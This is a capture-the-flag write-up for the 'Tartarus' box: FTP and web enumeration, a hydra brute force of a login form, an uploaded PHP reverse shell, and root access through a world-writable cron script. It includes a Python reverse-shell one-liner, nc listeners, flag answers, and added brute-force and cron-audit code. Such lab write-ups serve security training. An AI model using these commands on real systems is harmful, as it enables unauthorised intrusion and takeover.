From aldeid

This is a beginner box based on simple enumeration of services and basic privilege escalation techniques.

User Flag

Services enumeration

Let’s start by discovering the services with Nmap:

21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 ftp      ftp            17 Jul 05 21:45 test.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 98:6c:7f:49:db:54:cb:36:6d:d5:ff:75:42:4c:a7:e0 (RSA)
|   256 0c:7b:1a:9c:ed:4b:29:f5:3e:be:1c:9a:e4:4c:07:2c (ECDSA)
|_  256 50:09:9f:c0:67:3e:89:93:b0:c9:85:f1:93:89:50:68 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel


The FTP service allows anonymous access and hosts a test file, which is a rabbit hole. Nothing interesting in it:

[email protected]:/data/Tartarus$ ftp
Connected to
220 (vsFTPd 3.0.3)
Name ( anonymous
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 ftp      ftp          4096 Jul 05 21:31 .
drwxr-xr-x    3 ftp      ftp          4096 Jul 05 21:31 ..
drwxr-xr-x    3 ftp      ftp          4096 Jul 05 21:31 ...
-rw-r--r--    1 ftp      ftp            17 Jul 05 21:45 test.txt
226 Directory send OK.
ftp> get test.txt -
remote: test.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for test.txt (17 bytes).
vsftpd test file
226 Transfer complete.
17 bytes received in 0.00 secs (16.9231 kB/s)

Now, something should ring a bell: besides "." and "..", the listing shows a third entry named "..." (three dots), which is a regular directory hidden in plain sight.

ftp> cd "..."
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Jul 05 21:31 .
drwxr-xr-x    3 ftp      ftp          4096 Jul 05 21:31 ..
-rw-r--r--    1 ftp      ftp            14 Jul 05 21:45 yougotgoodeyes.txt
226 Directory send OK.

The file in this directory (yougotgoodeyes.txt) discloses a hidden web location (/sUp3r-s3cr3t):

ftp> get yougotgoodeyes.txt -
remote: yougotgoodeyes.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for yougotgoodeyes.txt (14 bytes).
226 Transfer complete.
14 bytes received in 0.00 secs (15.7692 kB/s)



Accessing the target over port 80/tcp shows the default Apache2 page for Ubuntu, but there is a robots.txt file that discloses a hidden location (/admin-dir) as well as a username (d4rckh):

[email protected]:/data/Tartarus$ curl
User-Agent: *
Disallow : /admin-dir

I told d4rckh we should hide our things deep.

The /admin-dir location is browsable (directory listing enabled) and hosts 2 files, userid and credentials.txt, which look like a user list and a password list:

[email protected]:/data/Tartarus$ curl -s | html2text 
****** Index of /admin-dir ******
[[ICO]]       Name             Last_modified    Size Description
[[PARENTDIR]] Parent_Directory                    -  
[[TXT]]       credentials.txt  2020-07-05 21:45  760  
[[   ]]       userid           2020-07-05 21:45   78  
     Apache/2.4.18 (Ubuntu) Server at Port 80


The /sUp3r-s3cr3t location disclosed by the FTP file hosts an authentication form that POSTs a username and a password to authenticate.php:

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <link rel="stylesheet" href="">
    <link href="style.css" rel="stylesheet" type="text/css">
</head>
<body>
    <div class="login">
        <form action="authenticate.php" method="post">
            <label for="username">
                <i class="fas fa-user"></i>
            </label>
            <input type="text" name="username" placeholder="Username" id="username" required>
            <label for="password">
                <i class="fas fa-lock"></i>
            </label>
            <input type="password" name="password" placeholder="Password" id="password" required>
            <input type="submit" value="Login">
        </form>
    </div>
</body>
</html>

Let's use hydra with the 2 files gathered so far (userid as the login list, credentials.txt as the password list) to brute force the form. The failure condition is the string "Incorrect", which the page returns for a bad login:

[email protected]:/data/Tartarus/files$ hydra -L userid -P credentials.txt http-post-form "/sUp3r-s3cr3t/authenticate.php:username=^USER^&password=^PASS^:Incorrect"
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra ( starting at 2020-08-22 07:32:08
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1313 login tries (l:13/p:101), ~83 tries per task
[DATA] attacking http-post-form://^USER^&password=^PASS^:Incorrect
[80][http-post-form] host:   login: enox   password: [email protected]
1 of 1 target successfully completed, 1 valid password found
Hydra ( finished at 2020-08-22 07:32:40
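As an added example (not code from the original writeup, and not hydra's own source), here is a minimal re-implementation of what the http-post-form module does above, run against a throwaway local HTTP server that imitates /sUp3r-s3cr3t/authenticate.php. The fake server, its single valid credential (enox with the constructed password "s3cr3t-pw"), and the small user and password lists are all assumptions made for the demo; the only thing taken from the page is the form field names and the "Incorrect" failure marker.

```python
"""Re-implementation of hydra's http-post-form logic against a fake authenticate.php.

Added example for this writeup; the target server, credential and word lists
below are constructed, not taken from the box.
"""
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

FAIL_MARKER = "Incorrect"        # the failure string hydra was given (":Incorrect")
VALID = ("enox", "s3cr3t-pw")    # constructed credential, NOT the box's real password


class FakeAuthenticate(BaseHTTPRequestHandler):
    """Imitates authenticate.php: 'Incorrect' on bad creds, a welcome page otherwise."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("username", [""])[0]
        pw = form.get("password", [""])[0]
        if (user, pw) == VALID:
            body = b"Welcome, upload form here"
        else:
            body = b"Incorrect username or password"
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_server():
    """Start the fake target on an ephemeral localhost port; returns (server, base_url)."""
    srv = HTTPServer(("127.0.0.1", 0), FakeAuthenticate)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d" % srv.server_port


def try_login(url, user, pw):
    """One POST shaped like hydra's 'username=^USER^&password=^PASS^'.

    Success is defined exactly as hydra does with a failure condition:
    the response body does NOT contain FAIL_MARKER."""
    data = urllib.parse.urlencode({"username": user, "password": pw}).encode()
    with urllib.request.urlopen(url, data=data, timeout=5) as resp:
        return FAIL_MARKER not in resp.read().decode(errors="replace")


def brute_force(url, users, passwords):
    """The -L/-P loop: every login against every password, stop at the first hit."""
    attempts = 0
    for user in users:
        for pw in passwords:
            attempts += 1
            if try_login(url, user, pw):
                return {"login": user, "password": pw, "attempts": attempts}
    return None


def demo():
    # Constructed stand-ins for the userid and credentials.txt files found in /admin-dir.
    users = ["d4rckh", "enox", "admin"]
    passwords = ["password", "letmein", "s3cr3t-pw", "admin123"]
    srv, base = start_server()
    try:
        return brute_force(base + "/sUp3r-s3cr3t/authenticate.php", users, passwords)
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print(demo())
```

The one detail worth keeping in mind when picking a failure string: it must appear in every failed response and in no successful one. Choosing a marker that a redirect or an error page also lacks (here, a 302 to the upload page) is what makes the first non-matching response a true positive rather than noise.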

Let's authenticate with the credentials found (enox:[email protected]). We are redirected to a page with an upload form.

Upload form

Let's upload a PHP reverse shell. Make sure you set your own IP and port in the PHP file before uploading it.

The reverse shell is uploaded, but the page does not tell us where. Let's use dirsearch within the /sUp3r-s3cr3t directory to find sub-directories:

[email protected]:/data/Tartarus/files$ /data/src/dirsearch/ -u -E -w /usr/share/wordlists/dirb/common.txt 

 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )

Extensions: php, asp, aspx, jsp, js, html, do, action | HTTP method: get | Threads: 10 | Wordlist size: 4614

Error Log: /data/src/dirsearch/logs/errors-20-08-22_07-43-36.log


[07:43:36] Starting: 
[07:43:37] 200 -  732B  - /sUp3r-s3cr3t/
[07:43:37] 403 -  278B  - /sUp3r-s3cr3t/.hta
[07:43:48] 301 -  328B  - /sUp3r-s3cr3t/images  ->
[07:43:49] 200 -  732B  - /sUp3r-s3cr3t/index.html

Task Completed

Browsing /sUp3r-s3cr3t/images/ reveals an uploads subdirectory (/sUp3r-s3cr3t/images/uploads/), which is where our file landed.

Reverse shell

Let's run a listener on the port set in the PHP file:

$ rlwrap nc -nlvp 4444

Then request the uploaded PHP file under /sUp3r-s3cr3t/images/uploads/ to trigger it. We now have a shell as www-data:

[email protected]:/data/Tartarus/files$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 52018
Linux ubuntu-xenial 4.4.0-184-generic #214-Ubuntu SMP Thu Jun 4 10:14:11 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 05:46:19 up 24 min,  0 users,  load average: 0.00, 0.01, 0.15
USER     TTY      FROM             [email protected]   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami

User flag

$ cat /home/d4rckh/user.txt

Answer: 0f7dbb2243e692e3ad222bc4eff8521f

Root Flag

Cleanup script

Having a look at d4rckh's home directory reveals a Python script that cleans up the /home/cleanup/ directory.

$ cat
# -*- coding: utf-8 -*-
#!/usr/bin/env python
import os
import sys
os.system('rm -r /home/cleanup/* ')

This is typically the kind of script that is scheduled via a cron job. Running pspy64 on the target confirms it: CRON spawns the script as UID 0, i.e. root.

2020/08/22 06:06:01 CMD: UID=0    PID=1864   | python /home/d4rckh/ 
2020/08/22 06:06:01 CMD: UID=0    PID=1863   | /bin/sh -c    python /home/d4rckh/ 
2020/08/22 06:06:01 CMD: UID=0    PID=1862   | /usr/sbin/CRON -f 
2020/08/22 06:06:01 CMD: UID=0    PID=1865   | python /home/d4rckh/ 

Moreover, the file is owned by root but world-writable (mode 777), which means any local user, including www-data, can modify it and have root execute the modified content on the next cron run.

$ cd d4rckh
$ ls -ila
total 16
257890 drwxr-xr-x 2 d4rckh d4rckh 4096 Jul  5 21:35 .
  1920 drwxr-xr-x 5 root   root   4096 Jul  5 21:45 ..
259257 -rwxrwxrwx 1 root   root    129 Jul  5 21:45
259258 -rw-r--r-- 1 d4rckh d4rckh   33 Jul  5 21:45 user.txt
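As an added example (not part of the original writeup), here is a small audit that looks for exactly this misconfiguration from the defender's side: a command that cron runs as root whose script is writable by other users, or sits in a directory where it can be replaced. The crontab lines are constructed for the demo (the page only shows pspy output, not the real crontab), the script files are created in a temporary directory with the relevant modes, and all helper names are my own.

```python
"""Audit cron entries run as root for scripts that other users can modify or replace.

Added example for this writeup; the crontab lines and files below are constructed.
"""
import os
import re
import stat
import tempfile

# System-crontab style line: five time fields, a user, then the command.
CRON_RE = re.compile(r"^\s*(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")


def script_paths(command):
    """Absolute paths mentioned in a cron command, e.g. 'python /home/x/a.py' -> ['/home/x/a.py']."""
    return [tok for tok in command.split() if tok.startswith("/")]


def world_writable(path):
    """True if 'other' has write permission on the file itself (the 777 case above)."""
    return bool(os.stat(path).st_mode & stat.S_IWOTH)


def dir_allows_replace(path):
    """True if the parent directory is world-writable without the sticky bit.

    Even a 644 root-owned script can then be unlinked and recreated by anyone,
    which is the same primitive as writing to it directly."""
    mode = os.stat(os.path.dirname(path)).st_mode
    return bool(mode & stat.S_IWOTH) and not (mode & stat.S_ISVTX)


def audit_crontab(lines):
    """Return [(path, [reasons])] for every root-run script a non-root user could control."""
    findings = []
    for line in lines:
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = CRON_RE.match(line)
        if not m or m.group("user") != "root":
            continue  # only root-run jobs give a privilege boundary to cross
        for path in script_paths(m.group("cmd")):
            if not os.path.isfile(path):
                continue
            reasons = []
            if world_writable(path):
                reasons.append("file is world-writable")
            if dir_allows_replace(path):
                reasons.append("parent directory is world-writable without sticky bit")
            if reasons:
                findings.append((path, reasons))
    return findings


def demo():
    """Build a constructed layout mirroring the box and audit a constructed crontab."""
    with tempfile.TemporaryDirectory() as tmp:
        home = os.path.join(tmp, "d4rckh")
        os.mkdir(home)
        os.chmod(home, 0o755)
        bad = os.path.join(home, "cleanup.py")       # constructed name; root-run, mode 777
        with open(bad, "w") as f:
            f.write("import os\nos.system('rm -r /home/cleanup/* ')\n")
        os.chmod(bad, 0o777)

        good = os.path.join(tmp, "backup.sh")        # constructed; sane 755 in a 700 dir
        with open(good, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(good, 0o755)

        drop = os.path.join(tmp, "dropbox")          # constructed; 777 dir, no sticky bit
        os.mkdir(drop)
        os.chmod(drop, 0o777)
        replaceable = os.path.join(drop, "rotate.sh")
        with open(replaceable, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(replaceable, 0o755)

        crontab = [
            "# m h dom mon dow user command   (constructed)",
            "* * * * * root python " + bad,
            "0 3 * * * root /bin/sh " + good,
            "30 2 * * * root " + replaceable,
            "* * * * * www-data touch " + bad,   # not root: no boundary crossed
        ]
        return audit_crontab(crontab)


if __name__ == "__main__":
    for path, reasons in demo():
        print(path, "->", "; ".join(reasons))
```

On a real host you would feed it /etc/crontab plus the files under /etc/cron.d and the per-user crontabs; the point is that the check has to cover both the file mode and the containing directory, since fixing only the 777 on the script leaves the replace-the-file route open.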

Privileged reverse shell

Let's take advantage of this and overwrite the script's content with a Python reverse shell. Set your attacking IP in s.connect and start a second listener on port 5555 before the next cron run:

printf 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"]);' >

Root flag

In the second listener, running on port 5555, we get a privileged reverse shell as soon as cron runs the modified script:

[email protected]:/data/src$ rlwrap nc -nlvp 5555
listening on [any] 5555 ...
connect to [] from (UNKNOWN) [] 51940
bash: cannot set terminal process group (1602): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:~# pwd
[email protected]:~# ls
[email protected]:~# cat root.txt
cat root.txt

Answer: 7e055812184a5fa5109d5db5c7eda7cd